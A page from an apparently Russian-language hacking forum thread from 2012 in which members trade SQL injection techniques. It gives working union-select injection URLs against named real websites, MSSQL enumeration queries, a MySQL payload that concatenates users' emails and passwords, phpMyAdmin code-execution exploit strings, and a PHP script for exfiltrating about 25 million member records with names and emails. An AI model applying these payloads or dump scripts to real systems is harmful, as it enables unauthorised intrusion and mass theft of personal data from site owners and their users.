Старый 17.10.2012, 21:34   #2451
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Consistent Посмотреть сообщение
2 spari
If not difficult to please show me an example link to the vulnerability that I cited above. Continuing an error. Whether or not сolumn_name or not table. Although the dump through havij, all these tables are present, output
I apologize for my bad English =)
your english is fine.
its mssql 2000,information_schema exist.
Код:
http://www.avemariasingles.com/amsMag/tellafriend.cfm?link=250 union select cast(count(schema_name) as varchar) from information_schema.schemata
there are 25 db's.
Код:
http://www.avemariasingles.com/amsMag/tellafriend.cfm?link=250 union select db_name()
Код:
http://www.avemariasingles.com/amsMag/tellafriend.cfm?link=250 union select db_name(1)
Код:
http://www.avemariasingles.com/amsMag/tellafriend.cfm?link=250 union select db_name(2)
etc.
to get tables from different db,use information_schema.
Код:
select table_name from inforamtion_schema.tables where table_schema="schema"
columns from other db-
Код:
select column_name from information_schema.columns where table_name="table" and schema_name="schema"
data-
Код:
select column from db..table
and not " db.table " like mysql.
you can also get them all with sysobjects.
Код:
http://www.avemariasingles.com/amsMag/tellafriend.cfm?link=250 union select name from master..sysdatabases
tables
Код:
select name from db..sysobjects
and get the columns with syscolumns.
spari вне форума   Ответить с цитированием
Старый 22.10.2012, 15:57   #2452
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

надо слить 25кк данных база MSSQL. есть какие нибудь идеи? пробовал разные php дамперы не канает.
консоля нету, удаленный доступ закрыт. хотелось бы sypexdumper но там нет поддержки mssql
aspi вне форума   Ответить с цитированием
Старый 22.10.2012, 20:10   #2453
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от aspi Посмотреть сообщение
надо слить 25кк данных база MSSQL. есть какие нибудь идеи? пробовал разные php дамперы не канает.
консоля нету, удаленный доступ закрыт. хотелось бы sypexdumper но там нет поддержки mssql
Может я херню сморозил,но если есть скуля,то выводи по несколько сотен.

(SELECT+@p+FROM+(SELECT+@p:=null,(SELECT+COUNT(*)+ FROM+(select+*+from+users+limit+0,100)r+WHERE+(@p: =CONCAT_WS(0x3c62723e,+@p,+CONCAT(email,0x3A,passw ord,0x3a,id)))>0))o)
kingbeef вне форума   Ответить с цитированием
Старый 22.10.2012, 20:37   #2454
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

Цитата:
Сообщение от aspi Посмотреть сообщение
надо слить 25кк данных база MSSQL. есть какие нибудь идеи? пробовал разные php дамперы не канает.
консоля нету, удаленный доступ закрыт. хотелось бы sypexdumper но там нет поддержки mssql
вешай proxy,а потом с ним конектимся каким-то клиентом с поддержкой прокси.
snake вне форума   Ответить с цитированием
Старый 22.10.2012, 22:43   #2455
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Если ты пробывал "разные дамперы", а удалённый доступ отсутствует, логично предположить что есть локальный.
Скрипт на пхп из 20 строк сольёт такой объем играючи, обычные select и fwrite.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 23.10.2012, 14:40   #2456
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

Цитата:
<?php
set_time_limit(0);
$servername = "10.10.10.10";
$database = "base";
$username = "root";
$password = "qwe";

$link = mssql_connect ($servername, $username, $password);
if (!$link)
die("Cannot connect to mssql server");
if (!mssql_select_db($database,$link))
die("Cannot select db");

$res = mssql_query("select top 26000000 Fname,Lname,Email from members", $link);
while ($data = mssql_fetch_array($res))
{
$Fname = addslashes($data['Fname']);
$Lname = addslashes($data['Lname']);
$Email = addslashes($data['Email']);
file_put_contents("test.txt","$Fname:$Lname:$Email \n",FILE_APPEND);
}
?>
сомневаюсь что сдампит 25кк

Последний раз редактировалось aspi; 24.10.2012 в 06:45.. Причина: а
aspi вне форума   Ответить с цитированием
Старый 23.10.2012, 15:59   #2457
blesse
 
Регистрация: 16.08.2012
Сообщений: 24
Репутация: -2
По умолчанию

Помогите, есть парочка вопросов по phpmyadmin's exploits
1) https://rdot.org/forum/showpost.php?p=25791&postcount=25
"6. Идем по адресу http://site.com/phpMyAdmin/config/config.inc.php - профит" сколько не видел PMA ни в одном не видел диры /config/ это редкая уязвимость или я что-то недопонял?
2)https://rdot.org/forum/showpost.php?p=24933&postcount=23 заполняю пасс\логин запускаю,перехожу по ливнку index.php?token='.$token.'&_SESSION[trg_db]={${phpinfo()}}%00&_SESSION[uncommon_tables][0]=qwe||/e%00&_SESSION[src_uncommon_tables][0]=qwe||/e%00&session_to_unset=123',
Ноль реакции,Pma 3.3.7deb7,PHP 5.3.3,magic_quotes=off
blesse вне форума   Ответить с цитированием
Старый 23.10.2012, 19:39   #2458
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

aspi
Цитата:
$res = mssql_query("select * from members", $link);
Сливайте порциями по 10к, например, используя TOP или ориентируясь по id.

blesse
1. Наоборот /config часто есть, правда сверху обычно basic-авторизация висит.
2. Из поста по ссылке сразу сверху:
Цитата:
PHP <= 5.2.13 & PHP <= 5.3.2=(

Последний раз редактировалось Untitled; 23.10.2012 в 19:45..
Untitled вне форума   Ответить с цитированием
Старый 24.10.2012, 06:43   #2459
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

а если так:

Цитата:
$res = mssql_query("select top 26000000 Fname,Lname,Email from members", $link);
не потянет? можно как-нибудь оптимизировать код чтоб можно было сливать быстро и без особой нагрузки на сервер
aspi вне форума   Ответить с цитированием
Старый 26.10.2012, 00:37   #2460
Сергей Бардюр
 
Регистрация: 27.09.2012
Сообщений: 10
Репутация: 0
По умолчанию

Не получается обойти фильтр на union select
http://www.45furniture.com/catalog/index.php?manufacturers_id=67+union+select+1+--+
Все паблик способы перепробованы... работает только конструкция без участия select:
1+or+1+group+by+mid(user(),rand(0)|0,64)+having+av g(0)+--+
Но при таком раскладе SQL не раскрутишь...
Я буду очень рад, если кто нибудь мне поможет данную SQL раскрутить до работоспособного варианта, хотя бы как слепую SQL.
Сергей Бардюр вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot